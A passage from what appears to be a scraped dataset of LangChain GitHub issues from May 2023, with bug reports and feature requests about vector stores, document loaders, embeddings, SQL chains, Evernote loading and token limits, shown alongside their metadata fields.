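        for chunk_id, meta in zip(get_payload["ids"], get_payload["metadatas"])
        if (meta or {}).get("source") == source
    ]

payload = {
    "ids": ["a1", "a2", "b1"],
    "metadatas": [{"source": "doc1.txt"}, {"source": "doc1.txt"}, {"source": "doc2.txt"}],
}
to_delete = ids_for_source(payload, "doc1.txt")
# then (assumption about internals): chroma_db._collection.delete(ids=to_delete)
```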
Deletion issue in Chroma vectorstore & how to see the doc IDs and embeddings stored
https://api.github.com/repos/langchain-ai/langchain/issues/4519/comments
11
2023-05-11T10:45:23Z
2024-02-14T16:14:03Z
https://github.com/langchain-ai/langchain/issues/4519
1,705,554,723
4,519
[ "langchain-ai", "langchain" ]
### System Info LangChain 0.0.165 on Google Colab ### Who can help? @eyurtsev ### Information - [ ] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [X] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction Just try to use FAISS and Pinecone with the same data. After a query with `similarity_search_with_score` the score is reversed. FAISS ``` docs = faiss_index.similarity_search_with_score("text to search", k=5) for doc in docs: score = doc[1] page_num = doc[0].metadata['page'] print(str(score) + " - " + page_num) 0.31319273 - 58 0.34054485 - 61 0.39556867 - 36 0.40675405 - 60 0.40916008 - 33 ``` Pinecone ``` docs = pinecone_index.similarity_search_with_score("text to search", k=5) for doc in docs: score = doc[1] page_num = doc[0].metadata['page'] print(str(score) + " - " + page_num) 0.843403578 - 58.0 0.82972753 - 61.0 0.80216819 - 36.0 0.79670471 - 60.0 0.795202613 - 33.0
The scores of `similarity_search_with_score` are not standardized across Vector Stores
https://api.github.com/repos/langchain-ai/langchain/issues/4517/comments
8
2023-05-11T09:19:18Z
2024-03-18T21:50:45Z
https://github.com/langchain-ai/langchain/issues/4517
1,705,414,556
4,517
[ "langchain-ai", "langchain" ]
### System Info **Langchain version:** 0.0.162 **Platform**: Windows **python version**: 3.11.3 I am trying to load all **.eml** files from my directory with loader_cls: UnstructuredEmailLoader to build an index, but I am getting an error in the load function. **error:** 'utf-8' codec can't decode byte 0x92 in position 141: invalid start byte **Code:** ``` def load_data(): if os.path.exists("./test"): # Load documents from data directory print('loading docs from directory ...') loader = DirectoryLoader('./test',loader_cls=UnstructuredEmailLoader) raw_documents = loader.load() print('loaded docs') #Splitting documents into chunks text_splitter = RecursiveCharacterTextSplitter( chunk_size=1000, chunk_overlap=200, ) documents = text_splitter.split_documents(raw_documents) print(len(documents)) # Changing source to point to the original document for x in documents: print(x) # Creating index and saving it to disk print("Creating index") db = FAISS.from_documents(documents, embeddings ) db.save_local("./index") else: raise Exception("No data or index found") ``` The following is the code I am using to read an email: ``` def get_email(data): # add try catch raw_email_string = data[0][1].decode('utf-8') # Getting the email email_obj = Email(raw_email_string) return email_obj ``` The problem is that there are over 5,000 emails, and the exception cannot even tell which file is causing the issue. How can I fix this? ### Who can help? @hwchase17 @eyurtsev @vowelparrot ### Information - [ ] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [X] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [X] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction Use code to test issue. ### Expected behavior 1. 
It should load all .eml email files within the provided directory 2. In case of an exception it should at least print the filename.
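Two things help here: wrap each file so the failing filename is reported, and fall back to a more forgiving decode, since byte 0x92 is typically a Windows-1252 curly apostrophe, which is invalid as a UTF-8 start byte. A sketch of the decode fallback (the per-file loop / loader wiring is left out):

```python
def safe_decode(raw: bytes, filename: str = "<unknown>") -> str:
    """Try UTF-8 first, then Windows-1252 (where 0x92 is a right quote),
    reporting which file needed the fallback."""
    try:
        return raw.decode("utf-8")
    except UnicodeDecodeError as exc:
        print(f"{filename}: {exc}; retrying as cp1252")
        return raw.decode("cp1252", errors="replace")

text = safe_decode(b"it\x92s a test", "mail_001.eml")
```

Dropping this into `get_email` in place of the bare `.decode('utf-8')`, with the source filename passed through, gives both the fix and the diagnostic.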
Unable to load .eml email files from DirectoryLoader with class UnstructuredEmailLoader: 'utf-8' codec can't decode byte 0x92 in position
https://api.github.com/repos/langchain-ai/langchain/issues/4515/comments
4
2023-05-11T08:00:31Z
2023-09-29T16:07:45Z
https://github.com/langchain-ai/langchain/issues/4515
1,705,280,664
4,515
[ "langchain-ai", "langchain" ]
### System Info langchain[openai]==0.0.165 Ubuntu 22.04.2 LTS (Jammy Jellyfish) python 3.10.6 ### Who can help? @vowelparrot ### Information - [ ] The official example notebooks/scripts - [X] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [X] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction The OpenAI component requires the `tiktoken` package, but if we install it like below, the `tiktoken` package is not found. ``` langchain[openai]==0.0.165 ``` It's natural to add `tiktoken`, since there is a dependency in the `pyproject.toml` file. https://github.com/hwchase17/langchain/blob/46b100ea630b5d1d7fedd6a32d5eb9ecbadeb401/pyproject.toml#L35-L36 Besides, the missing `tiktoken` dependency causes issues under dependency pinning tools like bazel or [jazzband/pip-tools](https://github.com/jazzband/pip-tools) ``` Traceback (most recent call last): File "/home/ofey/.cache/bazel/_bazel_ofey/90bb890b04415910673f256b166d6c9b/sandbox/linux-sandbox/15/execroot/walking_shadows/bazel-out/k8-fastbuild/bin/src/backend/services/world/internal/memory/test/test_test.runfiles/pip_langchain/site-packages/langchain/embeddings/openai.py", line 186, in _get_len_safe_embeddings import tiktoken ModuleNotFoundError: No module named 'tiktoken' ... File "/home/ofey/.cache/bazel/_bazel_ofey/90bb890b04415910673f256b166d6c9b/sandbox/linux-sandbox/15/execroot/walking_shadows/bazel-out/k8-fastbuild/bin/src/backend/services/world/internal/memory/test/test_test.runfiles/pip_langchain/site-packages/langchain/embeddings/openai.py", line 240, in _get_len_safe_embeddings raise ValueError( ValueError: Could not import tiktoken python package. This is needed in order to for OpenAIEmbeddings. Please install it with `pip install tiktoken`. 
``` ### Expected behavior Add a dependency in `pyproject.toml` ``` [tool.poetry.extras] ... openai = ["openai", "tiktoken"] ``` Actually I'm using langchain with bazel, this is my project: [ofey404/WalkingShadows](https://github.com/ofey404/WalkingShadows)
[pyproject.toml] add `tiktoken` to `tool.poetry.extras.openai`
https://api.github.com/repos/langchain-ai/langchain/issues/4513/comments
0
2023-05-11T07:54:40Z
2023-05-11T19:21:07Z
https://github.com/langchain-ai/langchain/issues/4513
1,705,271,162
4,513
[ "langchain-ai", "langchain" ]
I have developed a chatbot using **Langchain's OpenAI LLM (text-davinci)** model and added my own contextual data using the **llama index (GPT index)** on top of GPT's existing data. I'm facing an issue with a specific scenario in my chatbot. I have included the following FAQ in my training data, which consists of a large list of questions: *Q: Who is the Prime Minister of India? A: The Prime Minister of India is John Doe.* However, when I ask the bot this question, I want it to consistently provide this specific answer. While it does give the desired answer sometimes, most of the time it retrieves the answer from the internet or its own corpus, stating that the Prime Minister of India is Narendra Modi. Essentially, I want complete control over the response generated by GPT when I ask questions from my training dataset. However, I also want GPT to utilize its own corpus to answer questions that are not part of my training dataset. For instance, if I ask a question like "Tell me something about European culture," which is not in my training dataset, GPT should provide a response based on its own knowledge. But when I enquire about the "PM of India," it should always respond with "John Doe." It is important to note that this is **not a typical fine-tuning scenario**, as we are not looking to identify patterns in the questions. Fine-tuning fails when we ask questions like "Who is the wife of the PM?" since it provides the same answer as "Who is the PM?" I would greatly appreciate any suggestions or assistance regarding this matter.
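One common pattern for this: check the question against the curated FAQ first (exact or fuzzy string match) and only fall back to the model when nothing matches, which gives full control over curated answers while leaving open questions to GPT. A minimal sketch with a stub in place of the real LLM call; the FAQ entry and threshold are illustrative:

```python
import difflib

FAQ = {
    "who is the prime minister of india?": "The Prime Minister of India is John Doe.",
}

def answer(question: str, llm, threshold: float = 0.85) -> str:
    """Serve a curated FAQ answer when the question is close enough;
    otherwise defer to the model."""
    q = question.strip().lower()
    match = difflib.get_close_matches(q, list(FAQ), n=1, cutoff=threshold)
    if match:
        return FAQ[match[0]]
    return llm(question)

fake_llm = lambda q: "LLM answer"
curated = answer("Who is the Prime Minister of India?", fake_llm)
fallback = answer("Tell me something about European culture", fake_llm)
```

The caveat: plain string distance can still conflate related questions (the "wife of the PM" failure mentioned above), so in practice an embedding-based similarity check over the FAQ with a high threshold tends to be more robust than `difflib`.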
Get response from my training data using a GPT-based chatbot
https://api.github.com/repos/langchain-ai/langchain/issues/4512/comments
4
2023-05-11T07:23:16Z
2023-09-15T16:13:58Z
https://github.com/langchain-ai/langchain/issues/4512
1,705,225,886
4,512
[ "langchain-ai", "langchain" ]
### System Info I am trying to use the latest gpt-4-32k model with LangChain's ChatOpenAI but I am getting the error ``` The model: `gpt-4-32k` does not exist```. So can we use models other than OpenAI's base models? ### Who can help? _No response_ ### Information - [x] The official example notebooks/scripts - [X] My own modified scripts ### Related Components - [X] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [x] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction ``` from flask_socketio import emit from urllib.parse import urlparse from langchain.embeddings import OpenAIEmbeddings from langchain.text_splitter import RecursiveCharacterTextSplitter from langchain.vectorstores import Pinecone from langchain.chat_models import ChatOpenAI from langchain.chains import LLMChain from langchain.chains.question_answering import load_qa_chain from langchain.prompts import PromptTemplate import openai import pinecone import os import shutil import uuid import time import json import store.main as store from controller.scrape import ScrapeSite import services.calltype as CalltypeService import services.organization as OrganizationService # create completion process chain def create_completion_llm_chain(self): llm = ChatOpenAI(temperature=0, model_name='gpt-4-32k', max_tokens=2048, request_timeout=120) chain = load_qa_chain(llm, chain_type='stuff') return chain # generate llm chain chain = self.create_completion_llm_chain() query = 'here I added my query' # process prompt with sources on gpt response = chain.run(question=query, input_documents=sourceDocs) ``` using this token, you will get the error, ``` The model: `gpt-4-32k` does not exist``` ### Expected behavior It should work with any model that OpenAI provides.
Can't use gpt-4-32k model with ChatOpenAI
https://api.github.com/repos/langchain-ai/langchain/issues/4511/comments
5
2023-05-11T07:18:18Z
2023-11-16T16:07:57Z
https://github.com/langchain-ai/langchain/issues/4511
1,705,219,365
4,511
[ "langchain-ai", "langchain" ]
### System Info - langchain: 0.0.163 - python: 3.9.16 - OS: Ubuntu 22.04 ### Who can help? @shibanovp @hwchase17 ### Information - [ ] The official example notebooks/scripts - [X] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [X] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction Steps to reproduce: Getting error when running this code snippet: ```python from langchain.embeddings import OpenAIEmbeddings class AzureOpenAIEmbeddings(OpenAIEmbeddings): pass ``` Error: ``` Traceback (most recent call last): File "test.py", line 3, in <module> class AzureOpenAIEmbeddings(OpenAIEmbeddings): File "pydantic/main.py", line 139, in pydantic.main.ModelMetaclass.__new__ File "pydantic/utils.py", line 693, in pydantic.utils.smart_deepcopy File "../lib/python3.9/copy.py", line 146, in deepcopy y = copier(x, memo) File "../lib/python3.9/copy.py", line 230, in _deepcopy_dict y[deepcopy(key, memo)] = deepcopy(value, memo) File "../lib/python3.9/copy.py", line 172, in deepcopy y = _reconstruct(x, memo, *rv) File "../lib/python3.9/copy.py", line 270, in _reconstruct state = deepcopy(state, memo) File "../lib/python3.9/copy.py", line 146, in deepcopy y = copier(x, memo) File "../lib/python3.9/copy.py", line 210, in _deepcopy_tuple y = [deepcopy(a, memo) for a in x] File "../lib/python3.9/copy.py", line 210, in <listcomp> y = [deepcopy(a, memo) for a in x] File "../lib/python3.9/copy.py", line 146, in deepcopy y = copier(x, memo) File "../lib/python3.9/copy.py", line 230, in _deepcopy_dict y[deepcopy(key, memo)] = deepcopy(value, memo) File "../lib/python3.9/copy.py", line 172, in deepcopy y = _reconstruct(x, memo, *rv) File "../lib/python3.9/copy.py", line 264, in _reconstruct y = func(*args) File "../lib/python3.9/copy.py", line 263, 
in <genexpr> args = (deepcopy(arg, memo) for arg in args) File "../lib/python3.9/copy.py", line 146, in deepcopy y = copier(x, memo) File "../lib/python3.9/copy.py", line 210, in _deepcopy_tuple y = [deepcopy(a, memo) for a in x] File "../lib/python3.9/copy.py", line 210, in <listcomp> y = [deepcopy(a, memo) for a in x] File "../lib/python3.9/copy.py", line 172, in deepcopy y = _reconstruct(x, memo, *rv) File "../lib/python3.9/copy.py", line 264, in _reconstruct y = func(*args) File "../lib/python3.9/typing.py", line 277, in inner return func(*args, **kwds) File "../lib/python3.9/typing.py", line 920, in __getitem__ params = tuple(_type_check(p, msg) for p in params) File "../lib/python3.9/typing.py", line 920, in <genexpr> params = tuple(_type_check(p, msg) for p in params) File "../lib/python3.9/typing.py", line 166, in _type_check raise TypeError(f"{msg} Got {arg!r:.100}.") TypeError: Tuple[t0, t1, ...]: each t must be a type. Got (). ``` ### Expected behavior Expect to allow subclass as normal.
Cannot subclass OpenAIEmbeddings
https://api.github.com/repos/langchain-ai/langchain/issues/4498/comments
0
2023-05-11T04:42:23Z
2023-05-17T01:35:21Z
https://github.com/langchain-ai/langchain/issues/4498
1,705,053,735
4,498
[ "langchain-ai", "langchain" ]
### System Info langchain: 0.0.165 (and 0.0.151) python: 3.10 ### Who can help? @hwchase17 @agola11 ### Information - [ ] The official example notebooks/scripts - [X] My own modified scripts ### Related Components - [X] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [X] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [X] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction Use `RetrievalQAWithSourcesChain` with `Retriever` that returns some documents which the `LLMChainExtractor` compresses to empty strings which are filtered out for all documents, this results with a `IndexError` downstream from the compression. https://github.com/hwchase17/langchain/blob/f373883c1a5f451433e7817e5092f61e7bde3f2e/langchain/retrievers/document_compressors/chain_extract.py#L54-L61 Is the relevant code ^, maybe this code should gracefully fail if the `len(compressed_docs) == 0` at the end? <details> <summary>Error (click to unroll)</summary> ``` File ~/miniforge3/envs/foo/lib/python3.10/site-packages/langchain/chains/combine_documents/base.py:75, in BaseCombineDocumentsChain._call(self, inputs) 73 # Other keys are assumed to be needed for LLM prediction 74 other_keys = {k: v for k, v in inputs.items() if k != self.input_key} ---> 75 output, extra_return_dict = self.combine_docs(docs, **other_keys) 76 extra_return_dict[self.output_key] = output 77 return extra_return_dict File ~/miniforge3/envs/foo/lib/python3.10/site-packages/langchain/chains/combine_documents/map_reduce.py:139, in MapReduceDocumentsChain.combine_docs(self, docs, token_max, **kwargs) 131 def combine_docs( 132 self, docs: List[Document], token_max: int = 3000, **kwargs: Any 133 ) -> Tuple[str, dict]: 134 """Combine documents in a map reduce manner. 135 136 Combine by mapping first chain over all documents, then reducing the results. 
137 This reducing can be done recursively if needed (if there are many documents). 138 """ --> 139 results = self.llm_chain.apply( 140 # FYI - this is parallelized and so it is fast. 141 [{**{self.document_variable_name: d.page_content}, **kwargs} for d in docs] 142 ) 143 return self._process_results(results, docs, token_max, **kwargs) File ~/miniforge3/envs/foo/lib/python3.10/site-packages/langchain/chains/llm.py:118, in LLMChain.apply(self, input_list) 116 def apply(self, input_list: List[Dict[str, Any]]) -> List[Dict[str, str]]: 117 """Utilize the LLM generate method for speed gains.""" --> 118 response = self.generate(input_list) 119 return self.create_outputs(response) File ~/miniforge3/envs/foo/lib/python3.10/site-packages/langchain/chains/llm.py:61, in LLMChain.generate(self, input_list) 59 def generate(self, input_list: List[Dict[str, Any]]) -> LLMResult: 60 """Generate LLM result from inputs.""" ---> 61 prompts, stop = self.prep_prompts(input_list) 62 return self.llm.generate_prompt(prompts, stop) File ~/miniforge3/envs/foo/lib/python3.10/site-packages/langchain/chains/llm.py:74, in LLMChain.prep_prompts(self, input_list) 72 """Prepare prompts from inputs.""" 73 stop = None ---> 74 if "stop" in input_list[0]: 75 stop = input_list[0]["stop"] 76 prompts = [] IndexError: list index out of range ``` </details> ### Expected behavior Not fail in a cryptic way (see the error in the reproduction).
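The graceful failure suggested above could look roughly like this (a simplified sketch — `Document`, `compress`, and `combine` are stand-ins for the LangChain classes, not the real implementation):

```python
from dataclasses import dataclass
from typing import Callable, List

@dataclass
class Document:
    page_content: str

def compress(docs: List[Document], extract: Callable[[str], str]) -> List[Document]:
    """Keep only non-empty extractions; an empty list is a valid result
    that callers must check for instead of indexing into it."""
    compressed = []
    for doc in docs:
        output = extract(doc.page_content).strip()
        if output:  # drop documents whose extraction came back empty
            compressed.append(Document(page_content=output))
    return compressed

def combine(docs: List[Document]) -> str:
    # The guard that would avoid the IndexError above
    if not docs:
        return "No relevant documents found."
    return "\n".join(d.page_content for d in docs)

print(combine(compress([Document("x"), Document("y")], lambda text: "")))
```

With a guard like `combine`'s, an all-empty compression result produces a readable answer instead of a cryptic `IndexError` deep inside `prep_prompts`.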
`LLMChainExtractor` doesn't gracefully fail on empty compressed results
https://api.github.com/repos/langchain-ai/langchain/issues/4496/comments
4
2023-05-11T02:23:22Z
2023-10-21T16:09:15Z
https://github.com/langchain-ai/langchain/issues/4496
1,704,926,712
4,496
[ "langchain-ai", "langchain" ]
### Feature request The `EverNoteLoader` treats an export from Evernote as a very large text document by [combining the content from all notes](https://github.com/hwchase17/langchain/blob/master/langchain/document_loaders/evernote.py#L64-L68) into a single long text string. It also only saves the name of the [export file as metadata](https://github.com/hwchase17/langchain/blob/master/langchain/document_loaders/evernote.py#L81) on this large document. This isn't terribly useful when interrogating data from Evernote, whereby you might export an entire notebook which contains many notes; see an example notebook export below which has two notes. Ideally we should treat each note as an independent document with its own richer metadata, e.g. created, updated, title etc., to make retrieval more effective. ``` <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE en-export SYSTEM "http://xml.evernote.com/pub/evernote-export4.dtd"> <en-export export-date="20230611T011239Z" application="Evernote" version="10.56.9"> <note> <title>Test</title> <created>20230511T011217Z</created> <updated>20230511T011228Z</updated> <note-attributes> <author>Michael McGarry</author> </note-attributes> <content> <![CDATA[<?xml version="1.0" encoding="UTF-8" standalone="no"?> <!DOCTYPE en-note SYSTEM "http://xml.evernote.com/pub/enml2.dtd"><en-note><div>abc</div></en-note> ]]> </content> </note> <note> <title>Summer Training Program</title> <created>20221227T015948Z</created> <updated>20221227T020423Z</updated> <note-attributes> <author>Michael McGarry</author> <latitude>{redacted}</latitude> <longitude>{redacted}</longitude> <altitude>{redacted}</altitude> <source>mobile.iphone</source> </note-attributes> <content> <![CDATA[<?xml version="1.0" encoding="UTF-8" standalone="no"?> <!DOCTYPE en-note SYSTEM "http://xml.evernote.com/pub/enml2.dtd"><en-note><div><b>Jan - March 2022</b></div></en-note> ]]> </content> </note> </en-export> ``` ### Motivation Looking to add a tool to an agent which can interrogate
my Evernote journal entries. ### Your contribution I can put together a PR for this.
Evernote Document Loader Concatenates All Notes Together
https://api.github.com/repos/langchain-ai/langchain/issues/4493/comments
1
2023-05-11T01:58:37Z
2023-05-19T21:28:19Z
https://github.com/langchain-ai/langchain/issues/4493
1,704,886,910
4,493
[ "langchain-ai", "langchain" ]
### System Info Langchain version: 0.0.72 Next.js version: v13.4.1 ### Who can help? @hwchase17 @vowelparrot ### Information - [ ] The official example notebooks/scripts - [X] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [X] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [X] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction I'm using next.js and want to integrate langchain with Chroma. The error happened when I try to import { Chroma } from "langchain/vectorstores" in a my next.js file. When I run npm run dev, the error message is in the screenshot below: <img width="922" alt="截屏2023-05-10 17 42 35" src="https://github.com/hwchase17/langchain/assets/67210127/8ec6a8d2-8753-4990-af2f-f2e66af7db6d"> These are all the imports I'm doing: <img width="797" alt="截屏2023-05-10 17 43 14" src="https://github.com/hwchase17/langchain/assets/67210127/57d0fb2f-416b-479e-9a15-1412afce4459"> I checked and the error message is caused by the first line. Below is my next.config.js <img width="691" alt="截屏2023-05-10 17 45 00" src="https://github.com/hwchase17/langchain/assets/67210127/47fc9dc6-56a3-4d06-b454-c2474af6eb2f"> ### Expected behavior I only expect it to compile successfully
[Urgent] Module build failed: UnhandledSchemeError: Reading from "node:fs/promises" is not handled by plugins (Unhandled scheme).
https://api.github.com/repos/langchain-ai/langchain/issues/4491/comments
10
2023-05-11T00:45:19Z
2024-05-30T12:07:38Z
https://github.com/langchain-ai/langchain/issues/4491
1,704,804,178
4,491
[ "langchain-ai", "langchain" ]
### System Info LangChain version 0.0.164 ### Who can help? @hwchase17 ### Information - [X] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [X] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction Add `return_intermediate_steps=True` to ``` agent = PlanAndExecute( planner=planner, executor=executor, verbose=True, max_iterations=10) ```
Return Intermediate Steps for Plan and Execute
https://api.github.com/repos/langchain-ai/langchain/issues/4485/comments
2
2023-05-10T22:04:36Z
2023-11-16T16:08:02Z
https://github.com/langchain-ai/langchain/issues/4485
1,704,687,837
4,485
[ "langchain-ai", "langchain" ]
### Feature request Allow the `TextLoader` to optionally auto detect the loaded file encoding. If the option is enabled the loader will try all detected encodings by order of detection confidence or raise an error. Also enhances the default raised exception to indicate which read path raised the exception. ### Motivation Permits loading large datasets of text files with unknown/arbitrary encodings. ### Your contribution Will submit a PR for this
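A stdlib-only sketch of the fallback idea (the actual change orders detected encodings by confidence using a detection library; the fixed candidate list here is just an assumption for illustration):

```python
from typing import Sequence, Tuple

def read_text_any(path: str, candidates: Sequence[str] = ("utf-8", "latin-1")) -> Tuple[str, str]:
    """Try each candidate encoding in order; return (text, encoding) for the
    first successful decode, or raise a single error naming the path."""
    failures = []
    for enc in candidates:
        try:
            with open(path, encoding=enc) as f:
                return f.read(), enc
        except UnicodeError:  # covers UnicodeDecodeError
            failures.append(enc)
    raise RuntimeError(f"could not decode {path!r}; tried {failures}")

# Demo: latin-1 bytes that are invalid UTF-8 fall through to the second candidate
import tempfile, os
tmp = tempfile.NamedTemporaryFile(delete=False, suffix=".txt")
tmp.write(b"caf\xe9")
tmp.close()
text, enc = read_text_any(tmp.name)
os.unlink(tmp.name)
print(text, enc)
```

Raising one error that names the file also covers the "indicate which read path raised the exception" part of the request.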
TextLoader: auto detect file encodings
https://api.github.com/repos/langchain-ai/langchain/issues/4479/comments
0
2023-05-10T20:46:24Z
2023-05-18T13:55:16Z
https://github.com/langchain-ai/langchain/issues/4479
1,704,607,580
4,479
[ "langchain-ai", "langchain" ]
### Issue with current documentation: https://docs.langchain.com/docs/components/schema/text This has a typo. I cannot locate the Concepts docs in the git repo. ### Idea or request for content: Please provide this so I can begin proofing the docs
DOC: Cleanup text
https://api.github.com/repos/langchain-ai/langchain/issues/4474/comments
1
2023-05-10T19:34:08Z
2023-09-10T16:19:17Z
https://github.com/langchain-ai/langchain/issues/4474
1,704,519,100
4,474
[ "langchain-ai", "langchain" ]
### System Info langchain==0.0.164 python=3.11 system: Ubuntu ### Who can help? @eyurtsev @agola11 ### Information - [X] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [X] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [X] Agents / Agent Executors - [X] Tools / Toolkits - [X] Chains - [X] Callbacks/Tracing - [ ] Async ### Reproduction - pip install langchain==0.0.164 - pip install pandas test.db is a valid database that I can query using SQLAlchemy, and "sqlite:///test.db" is a correct path to the database. - Using chains ``` from langchain import OpenAI, SQLDatabase, SQLDatabaseChain db = SQLDatabase.from_uri("sqlite:///test.db") llm = OpenAI(temperature=0) db_chain = SQLDatabaseChain.from_llm(llm, db, verbose=True, return_direct=True) db_chain("what is the average voltage in BOT table?") ``` - When using **Agents** ``` from langchain.agents import create_sql_agent from langchain.agents.agent_toolkits import SQLDatabaseToolkit from langchain.sql_database import SQLDatabase from langchain.llms.openai import OpenAI from langchain.agents import AgentExecutor db = SQLDatabase.from_uri("sqlite:///test.db") toolkit = SQLDatabaseToolkit(db=db) agent_executor = create_sql_agent( llm=OpenAI(temperature=0), toolkit=toolkit, verbose=True ) agent_executor.run("what is the average voltage in BOT table?") ``` ### Expected behavior **Error message when using SQLDatabaseChain:** `> Entering new SQLDatabaseChain chain... what is the average voltage in BOT table? SQLQuery:
--------------------------------------------------------------------------- InvalidRequestError Traceback (most recent call last) Cell In[5], line 2 1 db_chain = SQLDatabaseChain.from_llm(llm, db, verbose=True, return_direct=True) ----> 2 db_chain("what is the average voltage in BOT table?") File ~/anaconda3/envs/langchain/lib/python3.11/site-packages/langchain/chains/base.py:140, in Chain.__call__(self, inputs, return_only_outputs, callbacks) 138 except (KeyboardInterrupt, Exception) as e: 139 run_manager.on_chain_error(e) --> 140 raise e 141 run_manager.on_chain_end(outputs) 142 return self.prep_outputs(inputs, outputs, return_only_outputs) File ~/anaconda3/envs/langchain/lib/python3.11/site-packages/langchain/chains/base.py:134, in Chain.__call__(self, inputs, return_only_outputs, callbacks) 128 run_manager = callback_manager.on_chain_start( 129 {"name": self.__class__.__name__}, 130 inputs, 131 ) 132 try: 133 outputs = ( --> 134 self._call(inputs, run_manager=run_manager) 135 if new_arg_supported 136 else self._call(inputs) 137 ) 138 except (KeyboardInterrupt, Exception) as e: ...
688 rbody, rcode, resp.data, rheaders, stream_error=stream_error 689 ) 690 return resp InvalidRequestError: Invalid URL (POST /completions)` **Error message when using agents:** ` --------------------------------------------------------------------------- ValidationError Traceback (most recent call last) Cell In[9], line 2 1 db = SQLDatabase.from_uri("sqlite:///test.db") ----> 2 toolkit = SQLDatabaseToolkit(db=db) 4 agent_executor = create_sql_agent( 5 llm=OpenAI(temperature=0), 6 toolkit=toolkit, 7 verbose=True 8 ) 9 agent_executor.run("what is the average voltage in BOT table?") File ~/anaconda3/envs/langchain/lib/python3.11/site-packages/pydantic/main.py:341, in pydantic.main.BaseModel.__init__() ValidationError: 1 validation error for SQLDatabaseToolkit llm field required (type=value_error.missing) `
SQL databasechain InvalidRequestError
https://api.github.com/repos/langchain-ai/langchain/issues/4469/comments
10
2023-05-10T18:29:16Z
2024-04-09T17:03:08Z
https://github.com/langchain-ai/langchain/issues/4469
1,704,436,744
4,469
[ "langchain-ai", "langchain" ]
### Feature request @hwchase17 Can we implement this [**SmartGPT** workflow](https://youtu.be/wVzuvf9D9BU)? Probably, it is also implemented but I didn't find it. Thi method looks like something simple but very effective. ### Motivation Improving the quality of the prompts and the resulting generation quality. ### Your contribution I can try to implement it but need direction.
`SmartGPT` workflow
https://api.github.com/repos/langchain-ai/langchain/issues/4463/comments
3
2023-05-10T15:52:11Z
2023-08-11T22:44:29Z
https://github.com/langchain-ai/langchain/issues/4463
1,704,219,508
4,463
[ "langchain-ai", "langchain" ]
### System Info win 11 , ### Who can help? @hwchase17 @agola11 ### Information - [ ] The official example notebooks/scripts - [X] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [X] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [X] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction here I have `tryAgent()` function that will retrieve the chunked dataset from `DeepLake` and use it in `ConversationalRetrievalChain` I tried to add : ` retriever.search_kwargs['max_tokens_limit'] = 2000` `memory = ConversationTokenBufferMemory(llm=llm_davinci)` in order to set the limit_token. ````python chat_history = [ ("what is the used code architecture in the skillful project?", " The used code architecture in the skillful project is a .NET solution with multiple projects.") ] def tryAgent(question: str): db =DeepLake(dataset_path=dataset_settings["path"], read_only=True, embedding_function=embeddings retriever = db.as_retriever() retriever.search_kwargs['distance_metric'] = 'cos' retriever.search_kwargs['fetch_k'] = 100 retriever.search_kwargs['maximal_marginal_relevance'] = True retriever.search_kwargs['k'] = 10 retriever.search_kwargs['reduce_k_below_max_tokens'] = True retriever.search_kwargs['max_tokens_limit'] = 2000 memory = ConversationTokenBufferMemory(llm=llm_davinci) qa = ConversationalRetrievalChain.from_llm( llm=llm_davinci, memory=memory, retriever=retriever) result = qa({"question": question, "chat_history": chat_history}) return jsonify({ "response": result['answer'] }) ```` but I'm still getting this error message : ```sh raise self.handle_error_response( openai.error.InvalidRequestError: -7131 is less than the minimum of 0 - 'max_tokens' ``` 